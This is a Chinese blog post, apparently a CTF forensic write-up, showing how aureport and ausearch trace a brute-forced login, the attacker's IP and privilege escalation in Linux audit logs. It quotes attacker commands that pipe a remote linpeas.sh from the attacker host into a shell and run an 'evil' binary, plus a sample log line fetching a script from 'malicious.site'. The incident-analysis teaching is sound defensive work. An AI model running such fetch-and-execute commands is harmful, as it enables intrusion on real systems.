使用aureport分析入侵行为

已于 2025-04-15 11:56:19 修改
阅读量877 收藏 27
点赞数 31
分类专栏: CTF Linux 日志审计 文章标签: 网络 auditd linux 日志审计 安全 取证 溯源
于 2025-04-15 11:53:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dalock/article/details/147246512
版权

如果黑客入侵了你的系统,如何分析他是如何入侵的呢?

在Linux中,我们可以通过分析auditd审计系统记录的日志,从而来初步分析黑客的入侵痕迹

auditd审计系统

概述

auditd是liunx内核的审计子系统,负责记录系统级事件(如文件访问、用户登录、命令执行等)

审计日志默认存储在/var/log/audit/中,内容为结构化的纯文本格式,每条记录由多个 key=value 字段组成,直接阅读比较困难,需要解析

核心组件

  • auditd 守护进程:后台运行,负责收集和存储审计日志(默认路径 /var/log/audit/
  • auditctl:配置工具,用于定义审计规则(如监控文件访问或系统调用)
  • ausearch & aureport:分析工具,前者搜索日志,后者生成统计报告
  • audispd:扩展插件,支持将日志转发到其他程序处理

在这里我们为了分析入侵行为,可以使用ausearch & aureport工具

  • aureport的统计性更强,能比较直观地了解
  • ausearch也可以使用,因为是搜索日志中的相关信息,显示的内容更加详细

这里我们主要关注aureport工具

aureport

aureport的作用是将原始日志转换为可读性强的汇总报告

常用命令

报告类型

命令示例

用途

汇总报告

aureport --sumary

显示审计日志的全局统计信息

登录事件

aureport -l

列出所有用户登录/注销事件

文件访问

aureport -f

显示被监控文件的访问记录

用户命令

aureport -x

查看用户执行的命令 (需配置审计规则)

系统调用事件

aureport -s

列出触发的系统调用事件

异常事件

aureport --failed

显示失败的操作 (如登录失败、权限拒绝)

时间范围过滤

aureport -ts 09:00 -te 17:00

生成指定时间段的报告

读取日志文件

aureport -if xxx

指定输入文件(默认读取/var/log/audit/audit.log)

关键字过滤

aureport -k xxx

按照审计规则的关键字(key)过滤事件

提高可读性

aureport -i

将数字UID/GID转换为用户名/组名

使用实例

下面以一个真实案例来了解如何使用aureport来分析

有某个攻击者入侵了你的系统,如何通过auditd审计系统来分析他是如何入侵的呢?

哪个账号被盗了?
aureport -l -if audit.log

可以看到 btlo 用户一直在尝试登录,但是一直登录失败,多次失败后再最后成功登陆

不难猜测攻击者爆破出了 btlo 的密码,成功进入了系统

有多少异常事件?
aureport --failed -if audit.log

可以看到有87次的登陆失败,这与我们之前看到的一致

而身份认证失败的次数有89次

攻击者的IP地址?
aureport --host -if audit.log

分析记录的host信息,可以看到有大量192.168.4.155的访问记录,经过分析排查不难猜测192.168.4.155就是攻击者的IP

使用了什么提权工具?

一般普通用户进来权限比较低,攻击者往往会进行提权

aureport --tty -if audit.log
  • --tty 生成终端相关事件的汇总报告

  • linpeas是常用的一个提权的脚本,用于列举在Linux系统上提升特权的所有可能方法,有兴趣的可以去他的Github页面进行了解
    • wget -O - http://192.168.4.155:8000/linpeas.sh | sh获取了linpeas.sh并执行
  • 之后又下载了一个evil文件,执行了./evil 0的操作
  • 很明显使用的提权工具就是linpeas,或许还包括evil
    • 结合linpeas./evil 0的操作可能用于获取root的权限
攻击者用于获取root权限的pid?

经过前面分析推测./evil 0的操作可能用于获取root的权限,所以我们查找evil相关的pid就可以

aureport -p -if audit.log | grep evil

pid为829992

More

后续还可以利用ausearch & aureport进一步分析攻击者的行为

比如配置了特定的auditd审计规则,可以根据审计规则中做的标识来进行筛选

示例
配置auditd审计规则

auditd审计规则配置了捕获所有执行命令的进程(关键参数:a=always, exit=退出时记录, S=系统调用, key=标签)

auditctl -a always,exit -F arch=b64 -S execve -k executed_commands

所有通过 execve 执行的程序(包括命令)均会被记录,标记为 executed_commands

查询命令执行日志

使用 ausearch 按标签筛选,-i 将数字字段转为易读名称

ausearch -k executed_commands -i

当然也可以使用 aureport ,这里为了显示更多信息所以使用 ausearch

输出示例
type=EXECVE msg=audit(2024-06-02 10:00:00.123:456): argc=3 a0="/bin/bash" a1="-c" a2="wget http://malicious.site/script.sh"
type=PROCTITLE msg=... : proctitle="bash -c id"

argca0/a1/a2 显示具体执行的命令及参数

Linux系统之aureport命令详解
weixin_56303229的博客
03-08 474
aureportLinux 审计系统中的一个命令行工具,用于生成关于审计日志的报告。它可以从审计日志文件中提取信息,并以结构化的方式展示出来,便于管理员分析系统的安全状态和活动情况。通过 aureport,可以方便地查看不同类型的审计事件,如登录尝试、文件访问、权限更改等。
linux审计工具aureport
u010674101的专栏
12-01 918
审计日志是一个记录了系统活动、安全事件和资源访问的详细信息的日志文件。它可以帮助管理员监视和追踪系统上发生的各种活动,包括用户登录、文件访问、进程创建、权限更改等。命令提供了一种以可读格式显示审计日志的方式,并提供了丰富的过滤和报告选项,以便根据不同的需求进行分析。是一个用于查看和分析Linux操作系统中的审计日志的命令行工具。命令通常需要管理员权限才能访问和分析审计日志。来获取更多关于该命令的详细信息和用法说明。命令的一些常见用法,你可以通过运行。
CentOS7日志审计
ezbuy的博客
07-16 1万+
写在前面的话: 最近公司在做等保,其中有审计的内容,因为第一次接触,所以在此粘贴在网上查找的各种资料,以作记录. 目录 一、用户空间审计系统简介 二、auditd配置文件 三、配置审计规则 四、审计日志内容 五、使用ausearch搜索审计日志 六、使用aureport查看审计报告 一、用户空间审计系统简介 Linux 内核有用日志记录事件的能力,包括记录系统调用和文件访问。管理...
aureport命令中ts及te的正确使用方法
狂客队长
12-27 939
aureport auditd
Linux系统之audit
bingshanzhu的专栏
04-29 1986
Linux 提供了用来记录系统安全信息的审计系统,使用 audit 系统可以在应用程序执行期间获取比如发生错误的时间,哪个文件导致错误以及原因,什么进程导致了错误等等信息。 用户空间审计系统 Linux内核拥有包括记录系统调用和文件访问等的日志记录事件的能力,管理员可以检查这些日志,确定是否存在安全漏洞,比如多次失败的登录尝试,或者用户对系统文件不成功的访问等。 1、Linux 内核中的几种系统调...
Linux系统审计实战:使用auditd全面跟踪用户行为
它涉及记录系统和应用程序上的关键活动,以检测和防止恶意行为、确保系统合规性,并提供发生安全事件后的调查线索。 ## 1.1 审计的目的和重要性 审计的主要目的包括但不限于: - **安全监控**:追踪和记录用户活动...
Linux日志管理全攻略】:日志文件分析与维护指南
本文详细介绍了Linux日志文件系统的结构、管理工具的使用以及日志文件的权限和安全设置。通过探讨日志文件的分析技巧、监控报警的实现和日志维护优化策略,提供了系统管理员和开发者实践中的指导。此外,本文还通过...
防止权限泄露:sudo密码策略和历史日志深度分析
本文深入探讨了sudo命令在权限管理中的基础使用、密码策略配置、历史日志分析及权限泄露风险防范。文章首先解释了sudo的基础知识和与之相关的权限泄露风险,接着详细分析了sudo密码策略的工作原理、配置方法以及高级...
银河麒麟V10日志管理与分析:洞察系统状态的窗口
银河麒麟V10日志管理系统是一套全面的日志管理和分析解决方案,旨在提高系统性能、保障网络安全并符合管理法规。本文首先概述了该系统的架构及其处理的日志文件结构与类型,然后深入探讨了日志分析技术,包括基础...
Ubuntu系统日志分析:命令行与快捷键的运用
[Ubuntu系统日志分析:命令行与快捷键的运用](https://opengraph.githubassets.com/f6a71907966b9441022545be1479385989df132f8ecef9ce21ef06e489674045/grafana/loki/issues/5385) # 1. Ubuntu系统日志概述 Ubuntu...
CentOS7 - 审计日志
三朝看客
09-20 4487
1、auditctl : 即时控制审计守护进程的行为的工具,比如如添加规则等等。 audtitctl -l #查看规则 auditctl -D #清空规则 2、aureport : 查看和生成审计报告的工具。 aureport -l #生成登录审计报告 3、ausearch : 查找审计事件的工具 ausearch -i -p 4096 4、autrace : 一个用于跟踪进程的命令。 autra...
Linux安全auditd审计工具使用说明
月生的静心苑
11-28 9171
audit 我们可以使用auditctl临时配置规则,服务重启失效,如果需要配置永久生效,我们需要将规则写入到配置文件中。auditd审计规则分成三个部分,控制规则:这些规则用于更改审计系统本身的配置和设置。文件系统规则:这些是文件或目录监视。使用这些规则,我们可以审核对特定文件或目录的任何类型的访问。系统调用规则:这些规则用于监视由任何进程或特定用户进行的系统调用。使用 ausearch ,您可以过滤和搜索事件类型。它还可以通过将数值转换为更加直观的值(如系统调用或用户名)来解释事件。
audit审计超详细介绍,常见审计规则示例,与syslog、secure对比
最新发布
ayychiguoguo的博客
07-25 4507
Audit(审计)在Linux系统中,特别是CentOS中,是一个用于监控和记录系统上各种操作的技术手段。Audit的主要功能是为系统管理员提供一个跟踪系统上与安全相关信息的方法。根据预配置的规则,Audit会生成日志条目,以尽可能多地记录系统上所发生的事件的相关信息。① Audit主要由以下几个部分组成:auditd:Audit守护进程负责把内核产生的信息写入到硬盘上,这些信息由应用程序和系统活动触发产生。
Linux audit log分析工具---aureport、ausearch、autrace
weixin_30420305的博客
06-28 1382
一、概述 上一篇(理解Linux Audit Service.)我们主要解析了audit服务的结构,audit服务的配置以及如何阅读audit log各项所代表的意思。这一篇我们主要介绍如何利用audit提供的三个工具aureport、ausearch、autrace有针对性地去统计分析以及跟踪log日志。 二、aureport RAW类型的audit log会存放在/var...
Auditd - Linux 服务器安全审计工具
闲云孤鹤
02-20 4480
首先,Linux中国祝贺读者 2015羊年春节快乐,万事如意! 。下面开始这个新年版审计工具的介绍。 安全防护是首先要考虑的问题。为了避免别人盗取我们的数据,我们需要时刻关注它。安全防护包括很多东西,审计是其中之一。 我们知道Linux系统上有一个叫 auditd 的审计工具。这个工具在大多数Linux操作系统中是默认安装的。那么auditd 是什么?该如何使用呢?下面我们开始介绍。
Linux中audit日志使用方法
热门推荐
Han的小站
02-27 5万+
auditd服务的安装: 以CentOS6.5为例,使用下面的方法确认auditd服务的安装情况: yumlist audit audit-libs 确认以下两个package是否安装: audit.x86_64
Linux 用户空间审计系统
samssm的专栏
05-15 1667
Linux 用户空间审计系统 2012-05-21 17:02 曹江华 51cto.com 字号:T | T Linux内核有用日志记录事件的能力,比如记录系统调用和文件访问。然后管理员可以评审这些日志,确定可能存在的安全漏洞,比如失败的登录尝试,或者用户对系统文件不成功的访问。这种功能称为Linux用户空间审计系统,在Red Hat Enterprise Linux
Linux auditd主机系统安全审计服务配置技术方案
watermelonbig的专栏
04-13 9212
Auditd是什么 AuditdLinux审计系统的用户空间组件。AuditdLinux审计守护进程的缩写。在Linux中,daemon被称为后台运行服务,当它在后台运行时,应用程序服务的末尾附加了一个“d”。auditd的工作是作为后台服务收集审计日志文件并将其写入磁盘。 审计系统由两个主要部分组成:用户空间应用程序和实用程序,以及内核端系统调用处理。内核组件接收来自用户空间应用程序的系统调用,并通过以下过滤器之一对其进行过滤:user、task、fstype或exit。 一旦系统调用通过了excl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Neolock

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值